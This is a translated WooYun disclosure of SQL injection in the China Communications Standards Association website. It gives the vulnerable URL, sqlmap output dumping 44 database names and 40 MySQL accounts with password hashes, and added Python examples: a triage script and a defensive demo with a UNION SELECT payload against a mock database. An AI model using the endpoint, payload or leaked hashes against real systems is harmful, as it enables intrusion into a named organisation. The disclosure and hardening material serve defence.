Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0128609

Title: China Communications Standards Association (CCSA) main site, high-risk SQL injection (3)

Related vendor: CNCERT National Internet Emergency Center (cncert国家互联网应急中心)

Author: MT哥

Submitted: 2015-07-23 15:12

Fix deadline: 2015-09-11 08:46

Published: 2015-09-11 08:46

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed to third-party partner organisation (CNCERT National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-07-23: details sent to the vendor, awaiting vendor handling
2015-07-28: vendor confirmed; details disclosed to the vendor only
2015-08-07: details disclosed to core white hats and domain experts
2015-08-17: details disclosed to regular white hats
2015-08-27: details disclosed to trainee white hats
2015-09-11: details disclosed to the public

Brief description:

A blatant injection!

Details:

http://www.ccsa.org.cn/tc/baopi.php?baopi_id=4640

Proof of vulnerability:

[12:06:32] [INFO] fetching database names
available databases [44]:
[*] article
[*] auth
[*] ccsa_access_log
[*] ccsadoc
[*] client_update
[*] customer
[*] del_mladvert
[*] del_ptpic
[*] del_pw_log
[*] del_style
[*] del_test
[*] del_tmparticle
[*] doc
[*] fileopen
[*] ftpusers
[*] good_member
[*] gsc15
[*] information_schema
[*] IOofCOM
[*] jiaoliu
[*] log
[*] logs
[*] lost+found
[*] maintain
[*] meeting
[*] ml4ccsa
[*] ml4ptsn
[*] mnogosearch
[*] mysql
[*] phpmyadmin
[*] prod
[*] prodex
[*] questionnaire
[*] sales
[*] shenbao
[*] std
[*] std_temp
[*] stdcd
[*] tc485
[*] test
[*] tlc
[*] tspc
[*] userstd
[*] vpopmail
database management system users password hashes:
[*] auth_rd [1]:
password hash: 300582b60d0ce39f
[*] auth_rw [1]:
password hash: 7363df490bd6e5ee
[*] backup [1]:
password hash: 6360f4a4380593b6
[*] ccsa_rd [1]:
password hash: 694bf0e84e1746b6
[*] ccsa_rw [1]:
password hash: 0bbe89a47b7e9f94
[*] doc_rd [1]:
password hash: 6f8c7ba26dfd93fe
[*] doc_rw [1]:
password hash: 67c4ea1842a027a1
[*] ftp [1]:
password hash: 654925394d80d5e4
[*] infosrv [1]:
password hash: 1c9c80061d48e945
[*] log_rd [1]:
password hash: 408efbf60d3c8899
[*] log_rw [1]:
password hash: 32a437f543402d9c
[*] mailuser [1]:
password hash: 14780cf32b1ea347
[*] maint_rw [1]:
password hash: 7f38034b3972ae37
[*] mepadmin [1]:
password hash: 6fc780f149d98015
[*] minfosrv [1]:
password hash: 6c90aa2604862b9b
[*] mlog [1]:
password hash: 06988dd331f93204
[*] mproduct [1]:
password hash: 32099b90045157c1
[*] mptpic [1]:
password hash: 773359240eb9a1d9
[*] mptqc [1]:
password hash: 0107187807836006
[*] mptsn_auth [1]:
password hash: 57cf2b7f207cc98c
[*] prod_rd [1]:
password hash: 7ac54f89754e39ab
[*] prod_rw [1]:
password hash: 3d4faebb32aedf8c
[*] ptpic [1]:
password hash: 0206b55f23e2e967
[*] ptpic_rd [1]:
password hash: 34bba4f421608fb9
[*] ptpic_rw [1]:
password hash: 5b85aec77f441075
[*] ptqc [1]:
password hash: 6ec627e402484936
[*] ptqc_rd [1]:
password hash: 58eba2fc22d22204
[*] ptqc_rw [1]:
password hash: 326fd13f1db64eba
[*] ptsn_auth [1]:
password hash: 362f29946e86ae30
[*] readall [1]:
password hash: 13f162af21797902
[*] root [1]:
password hash: 0af4727b4f928228
[*] shouli [1]:
password hash: 1f1d533a5b0f5247
[*] shouli_rd [1]:
password hash: 472c940019929961
[*] shouli_rw [1]:
password hash: 5bd622e73f6459c9
[*] std_rd [1]:
password hash: 12e8cd2f1c97b82d
[*] std_rw [1]:
password hash: 4b31b6b72a2ffa73
[*] tlcadmin [1]:
password hash: 0c979a9e1a1a7df0
[*] tlcwebuser [1]:
password hash: 0c979a9e1a1a7df0
[*] userstd_rw [1]:
password hash: 57aec995239e6fc7
[*] vpopmail [1]:
password hash: 38755f107acb1b50
database management system users [40]:
[*] 'auth_rd'@'localhost'
[*] 'auth_rw'@'localhost'
[*] 'backup'@'%'
[*] 'ccsa_rd'@'localhost'
[*] 'ccsa_rw'@'localhost'
[*] 'doc_rd'@'localhost'
[*] 'doc_rw'@'localhost'
[*] 'ftp'@'127.0.0.1'
[*] 'infosrv'@'localhost'
[*] 'log_rd'@'localhost'
[*] 'log_rw'@'localhost'
[*] 'mailuser'@'%'
[*] 'maint_rw'@'localhost'
[*] 'mepadmin'@'localhost'
[*] 'minfosrv'@'localhost'
[*] 'mlog'@'localhost'
[*] 'mproduct'@'localhost'
[*] 'mptpic'@'localhost'
[*] 'mptqc'@'localhost'
[*] 'mptsn_auth'@'localhost'
[*] 'prod_rd'@'localhost'
[*] 'prod_rw'@'localhost'
[*] 'ptpic'@'localhost'
[*] 'ptpic_rd'@'localhost'
[*] 'ptpic_rw'@'localhost'
[*] 'ptqc'@'localhost'
[*] 'ptqc_rd'@'localhost'
[*] 'ptqc_rw'@'localhost'
[*] 'ptsn_auth'@'localhost'
[*] 'readall'@'localhost'
[*] 'root'@'localhost'
[*] 'shouli'@'localhost'
[*] 'shouli_rd'@'localhost'
[*] 'shouli_rw'@'localhost'
[*] 'std_rd'@'localhost'
[*] 'std_rw'@'localhost'
[*] 'tlcadmin'@'localhost'
[*] 'tlcwebuser'@'localhost'
[*] 'userstd_rw'@'localhost'
[*] 'vpopmail'@'localhost'
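Three things in the dump above deserve a second look before it is filed as "a list of hashes": every hash is 16 hex characters, which is MySQL's pre-4.1 OLD_PASSWORD() format rather than the 41-character mysql_native_password form; tlcadmin and tlcwebuser carry the identical hash 0c979a9e1a1a7df0, so they share a password; and backup and mailuser are granted from any host ('%'). The script below is an added example, not part of the original report, that pulls exactly those findings out of sqlmap's --users/--passwords listing. The embedded input is an excerpt copied from the listing above, trimmed to four accounts; the hash-shape test for mysql_native_password uses a constructed value that does not appear on this page.

```python
import re
from collections import defaultdict

# Excerpt copied from the sqlmap listing on this page, trimmed to four
# accounts so the example stays short (constructed input, same format).
SQLMAP_OUTPUT = """\
database management system users password hashes:
[*] backup [1]:
    password hash: 6360f4a4380593b6
[*] root [1]:
    password hash: 0af4727b4f928228
[*] tlcadmin [1]:
    password hash: 0c979a9e1a1a7df0
[*] tlcwebuser [1]:
    password hash: 0c979a9e1a1a7df0
database management system users [4]:
[*] 'backup'@'%'
[*] 'root'@'localhost'
[*] 'tlcadmin'@'localhost'
[*] 'tlcwebuser'@'localhost'
"""

# "[*] <user> [n]:" followed on the next line by "password hash: <hash>"
HASH_RE = re.compile(r"^\[\*\] (\S+) \[\d+\]:\n\s*password hash: (\S+)", re.M)
# "[*] '<user>'@'<host>'"
USER_RE = re.compile(r"^\[\*\] '([^']+)'@'([^']+)'", re.M)


def hash_format(h):
    """Classify a MySQL authentication hash by its shape alone."""
    if re.fullmatch(r"[0-9a-f]{16}", h):
        # 64-bit hash from MySQL < 4.1 (OLD_PASSWORD()); weak and deprecated.
        return "pre-4.1 OLD_PASSWORD"
    if re.fullmatch(r"\*[0-9A-F]{40}", h):
        # mysql_native_password: '*' + hex(SHA1(SHA1(password)))
        return "mysql_native_password"
    return "unknown"


def triage(output):
    """Return a list of human-readable findings from sqlmap user/hash output."""
    hashes = dict(HASH_RE.findall(output))          # user -> hash
    hosts = defaultdict(list)                        # user -> [host, ...]
    for user, host in USER_RE.findall(output):
        hosts[user].append(host)

    findings = []
    by_hash = defaultdict(list)
    for user, h in hashes.items():
        by_hash[h].append(user)
        if hash_format(h) == "pre-4.1 OLD_PASSWORD":
            findings.append(f"{user}: legacy 16-char hash {h}")
    for h, users in by_hash.items():
        if len(users) > 1:                           # same hash => same password
            findings.append(f"shared password: {', '.join(users)} ({h})")
    for user, user_hosts in hosts.items():
        if "%" in user_hosts:                        # grant is not host-restricted
            findings.append(f"{user}: reachable from any host ('%')")
    return findings


if __name__ == "__main__":
    for line in triage(SQLMAP_OUTPUT):
        print(line)
```

Run against the full listing above it also reports mailuser as host-unrestricted; the account-to-host join is done by name only, which is fine here because sqlmap emits one host per account in this dump.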

Fix recommendation:

WAF plus input filtering

Copyright notice: when reposting, credit MT哥@乌云 (WooYun)
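A WAF and filtering reduce exposure, but the durable fix for an endpoint like baopi.php?baopi_id=4640 is to validate the parameter as an integer and bind it, so attacker input never becomes SQL text. The following is an added example, not code from ccsa.org.cn (whose source is not on this page): the original endpoint is PHP on MySQL, and this models it in Python against an in-memory SQLite database whose table and column names are invented. It shows the string-concatenated query that a sqlmap-style UNION payload walks straight through, beside the hardened form that rejects the same input.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the site's backend; schema names are invented."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE baopi (baopi_id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE dbusers (user TEXT, password TEXT);
        INSERT INTO baopi VALUES (4640, 'public document 4640');
        INSERT INTO baopi VALUES (4641, 'public document 4641');
        -- root hash copied from the dump above; it lives in a table the
        -- public page is never supposed to read
        INSERT INTO dbusers VALUES ('root', '0af4727b4f928228');
    """)
    return con


def lookup_vulnerable(con, baopi_id):
    """Equivalent of "... WHERE baopi_id=" . $_GET['baopi_id'] in PHP:
    the raw query-string value is pasted into the SQL text."""
    sql = "SELECT title FROM baopi WHERE baopi_id=" + baopi_id
    return [row[0] for row in con.execute(sql)]


def lookup_hardened(con, baopi_id):
    """Two independent controls: strict type validation, then parameter binding."""
    # str.isdigit()/int() are too permissive (they accept whitespace, '+',
    # '_' and non-ASCII digits); insist on ASCII digits only.
    if not re.fullmatch(r"[0-9]+", baopi_id):
        raise ValueError("baopi_id must be a non-negative integer")
    sql = "SELECT title FROM baopi WHERE baopi_id=?"
    return [row[0] for row in con.execute(sql, (int(baopi_id),))]


# sqlmap-style UNION payload (constructed): one column, matching the original
# SELECT, so the attacker's row is appended to the normal result set.
# MySQL would use CONCAT(); '||' is the SQLite spelling for this model.
PAYLOAD = "4640 UNION SELECT user || ':' || password FROM dbusers"


if __name__ == "__main__":
    con = build_db()
    print("vulnerable:", lookup_vulnerable(con, PAYLOAD))
    try:
        lookup_hardened(con, PAYLOAD)
    except ValueError as e:
        print("hardened rejected payload:", e)
```

A WAF signature for "UNION SELECT" would stop this particular payload and miss the next encoding of it; the regex-plus-bind-parameter pair above does not depend on recognising the payload at all.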


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-07-28 08:44

Vendor reply:

CNVD confirms the reported situation; CNVD has notified the site operator by e-mail through its public contact channel.

Latest status:

None yet